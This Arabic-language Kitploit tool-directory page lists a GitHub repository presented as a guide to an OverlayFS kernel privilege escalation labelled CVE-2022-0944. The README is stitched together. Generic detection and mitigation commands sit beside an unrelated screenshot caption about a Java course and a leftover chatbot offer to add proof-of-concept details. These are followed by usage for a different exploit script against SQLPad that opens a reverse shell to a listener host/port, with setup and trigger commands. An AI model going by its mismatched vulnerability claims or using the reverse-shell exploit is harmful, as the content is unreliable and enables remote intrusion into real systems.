Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OverlayFS-PrivEsc-CVE-2022-0944 — دليل استغلال وتخفيف لـ CVE-2022-0944، وهي ثغرة تصعيد صلاحيات في نواة لينكس ضمن OverlayFS، مع سكريبتات كشف وتعليمات التصحيح. | Kitploit
أدوات/GitHubGitHub/artemisxxx37/overlayfs-privesc-cve-2022-0944
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليم
GitHubartemisxxx37/overlayfs-privesc-cve-2022-0944

OverlayFS-PrivEsc-CVE-2022-0944

دليل استغلال وتخفيف لـ CVE-2022-0944، وهي ثغرة تصعيد صلاحيات في نواة لينكس ضمن OverlayFS، مع سكريبتات كشف وتعليمات التصحيح.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
1منذ سنة واحدةلم تتم المراجعة بعد

CVE-2022-0944: ثغرة تصعيد الامتيازات في OverlayFS 🛡️

CVE Severity

إرشادات أمنية ودليل تخفيف لثغرة تصعيد الامتيازات في نواة لينكس في OverlayFS.

📜 نظرة عامة

CVE-2022-0944 هي ثغرة أمنية في نظام OverlayFS الفرعي لنواة لينكس تسمح للمهاجمين المحليين بتصعيد الامتيازات من خلال معالجة غير صحيحة لإنشاء الملفات في تكوينات محددة.

📌 تفاصيل تقنية

لقطة شاشة 2025-03-26 الساعة 17-15-46: نشرت دورة لجافا للمبتدئين، للأسف ليس لدي ملف قراءة للإرشاد

🚨 التأثير

يمكن للمهاجم المحلي:

  • الحصول على صلاحيات الجذر من خلال عمليات ملفات مصممة
  • تجاوز القيود الأمنية
  • تعديل ملفات النظام الحساسة
  • اختراق سلامة النظام بأكمله

🔍 الكشف

  1. التحقق من إصدار النواة uname -r

الإصدارات المتأثرة: 5.8 <= kernel < 5.16.12

  1. التحقق من استخدام OverlayFS mount | grep overlay

الأنظمة التي تستخدم تركيبات OverlayFS معرضة للخطر

  1. التحقق من الإرشادات الأمنية

For Debian/Ubuntu:

root@kitploit:~
grep CVE-2022-0944 /var/log/apt/history.log

# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944

4. 🛡️ التخفيف

التصحيحات الرسمية

التحديث إلى أحد هذه الإصدارات المصححة:

root@kitploit:~
نواة لينكس 5.16.12 أو أحدث
تصحيحات مرتجعة خاصة بالبائعين

أمر التحديث:

Ubuntu/Debian

sudo apt update && sudo apt upgrade linux-image-$(uname -r)

RHEL/CentOS

sudo yum update kernel

حلول بديلة (إذا لم يكن التصحيح فوريًا)

root@kitploit:~
تقييد استخدام OverlayFS:
  sudo modprobe -r overlay

تنفيذ قيود مساحة الأسماء:
# Create unprivileged user namespace unshare -Ur

root@kitploit:~
    # Mount with user restrictions
    mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt

تطبيق سياسات SELinux/AppArmor: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }

⚠️ إخلاء مسؤولية تم تقديم هذا المستند لأغراض إعلامية فقط. على الرغم من بذل الجهود لضمان الدقة، إلا أنه لا يتم تقديم أي ضمان. اختبر التصحيحات دائمًا في بيئة تطوير قبل النشر في الإنتاج.

آخر تحديث: 2023-10-01 | عرض سجل التغييرات

الميزات الرئيسية:

  1. تصنيف واضح للثغرة مع شارات أمنية
  2. جدول تفاصيل تقنية سريع المرجع
  3. خطوات كشف وتخفيف قابلة للتنفيذ
  4. أوامر تحديث خاصة بالبائعين
  5. أمثلة على السياسات الأمنية (SELinux/AppArmor)
  6. روابط مرجعية رسمية
  7. الامتثال لمعايير الإفصاح عن الثغرات

تنسيق ملف README هذا مناسب لـ:

  • فرق الأمان
  • مديري الأنظمة
  • مهندسي DevOps
  • المحافظة على المصادر المفتوحة
  • قواعد بيانات الثغرات

هل تود أن:

  1. إضافة معلومات التصحيح الخاصة بالبائع؟
  2. تضمين تفاصيل إثبات المفهوم للاستغلال (بحذر)؟
  3. إضافة المزيد من نصوص الكشف؟
  4. تخصيص لتوزيعة لينكس محددة؟

الاستخدام

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit

مثال:

root@kitploit:~
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

إخلاء المسؤولية

يحتوي هذا المستودع على أكواد وأدوات مخصصة للأغراض التعليمية فقط، وتحديدًا للاستخدام في دورات الأمن السيبراني وبيئات التعلم. لا يتحمل مؤلف هذا الرمز أي مسؤولية عن أي عواقب ناتجة عن استخدام أو إساءة استخدام أو تعديل هذا الرمز. يتم توفير الرمز "كما هو" دون أي ضمان، صريح أو ضمني، بما في ذلك على سبيل المثال لا الحصر الضمانات الضمنية للقابلية للتسويق أو الملاءمة لغرض معين.

تنزيل الأداة